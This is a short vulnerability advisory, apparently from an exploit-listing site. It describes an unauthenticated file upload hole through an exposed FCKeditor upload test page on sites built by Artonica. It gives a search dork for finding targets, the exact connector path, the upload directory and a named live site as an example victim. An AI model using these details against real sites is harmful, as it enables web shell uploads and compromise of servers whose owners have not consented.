Разработка сайта Artonica Russia Unauthorized File Insertion

2019.05.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#################################################################### # Exploit Title : Разработка сайта Artonica Russia Unauthorized File Insertion # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 21/05/2019 # Vendor Homepage : artonica.ru # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:Разработка сайта: Artonica site:ru # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description About Software : ***************************** Artonica is a Web Design and Development Company in Russia. #################################################################### # Impact : *********** Artonica is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. #################################################################### # Arbitrary File Upload / Unauthorized File Insert Exploit : ************************************************** /common/admin/vendor/fckeditor/editor/filemanager/connectors/uploadtest.html Select the "File Uploader" to use: Resource Type : PHP Directory File Path : ****************** /common/upload/[YOURFILENAME].txt .jpg .gif .png #################################################################### # Example Vulnerable Sites : ************************ [+] afrocom.ru/common/admin/vendor/fckeditor/editor/filemanager/connectors/uploadtest.html #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top